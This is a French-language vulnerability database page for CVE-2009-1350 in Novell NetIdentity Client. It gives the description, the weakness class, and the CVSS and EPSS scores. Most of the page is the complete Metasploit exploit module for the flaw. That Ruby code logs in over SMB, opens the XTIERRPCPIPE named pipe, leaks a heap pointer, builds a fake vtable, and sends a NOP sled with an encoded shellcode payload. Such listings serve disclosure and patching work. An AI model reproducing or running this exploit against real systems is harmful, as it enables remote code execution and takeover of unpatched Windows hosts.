CVE-2009-1350
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Unspecified vulnerability in xtagent.exe in Novell NetIdentity Client before 1.2.4 allows remote attackers to execute arbitrary code by establishing an IPC$ connection to the XTIERRPCPIPE named pipe, and sending RPC messages that trigger a dereference of an arbitrary pointer.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16376
Date de publication : 2010-11-23 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: netidentity_xtierrpcpipe.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
able to execute arbitrary code. The success of this module is much greater once the
service has been restarted.
},
'Author' => [ 'MC', 'Ruben Santamarta' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2009-1350' ],
[ 'OSVDB', '53351' ],
[ 'BID', '34400' ],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process', # only one shot!
},
'Payload' =>
{
'Space' => 550,
'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
],
'Privileged' => true,
'DisclosureDate' => 'Apr 6 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']),
OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'])
], self.class )
end
def mem_leak
print_status("Connecting to the server...")
connect()
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
begin
smb_login()
rescue ::Exception => e
print_error("Error: #{e}")
disconnect
return
end
print_status("Connecting to named pipe \\XTIERRPCPIPE...")
# If the pipe doesn't exist, bail.
begin
pipe = simple.create_pipe('\\XTIERRPCPIPE')
rescue ::Exception => e
print_error("Error: #{e}")
disconnect
return
end
# If we get this far, do the dance.
fid = pipe.file_id
# Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
# Send the first request to get our pointer.
leak = [0x00000004].pack('V') + [0x00000818].pack('V')
leak << rand_text_alpha_upper(2040)
print_status("Sending malformed request...")
pipe.write(leak)
heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]
print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))
print_status("Building fake VTable...")
object = heap_pointer_leaked + 0x700
print_status(sprintf("Object: 0x%.8x", object))
method = object + 0x30
print_status(sprintf("Method: 0x%.8x", method))
shellcode = method + 0xA0
print_status(sprintf("Shellcode: 0x%.8x", shellcode))
pipe.close
return heap_pointer_leaked,object,method,shellcode
end
def exploit
heap_pointer_leaked,object,method,shellcode = mem_leak()
return if not shellcode
sploit = [0x00000002].pack('V')
sploit << [0x00000000].pack('V')
sploit << [object].pack('V')
sploit << [0x00000000].pack('V')
sploit << rand_text_alpha_upper(240)
sploit << [object].pack('V') * 32
sploit << [method].pack('V') * 32
sploit << [shellcode].pack('V') * 32
sploit << make_nops(748)
sploit << payload.encoded
sploit << rand_text_alpha_upper(110)
print_status("Connecting to the server...")
connect()
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
begin
smb_login()
rescue ::Exception => e
print_error("Error: #{e}")
disconnect
return
end
print_status("Connecting to named pipe \\XTIERRPCPIPE...")
# If the pipe doesn't exist, bail.
begin
pipe = simple.create_pipe('\\XTIERRPCPIPE')
rescue ::Exception => e
print_error("Error: #{e}")
disconnect
return
end
# ok, set up and send our exploit buffer...
fid = pipe.file_id
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
print_status("#{sploit.length} bytes written...")
pipe.write(sploit)
handler
disconnect
end
end
Products Mentioned
Configuraton 0
Novell>>Netidentity_client1.2.3 >> Version *
Références
http://www.securityfocus.com/archive/1/502514/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
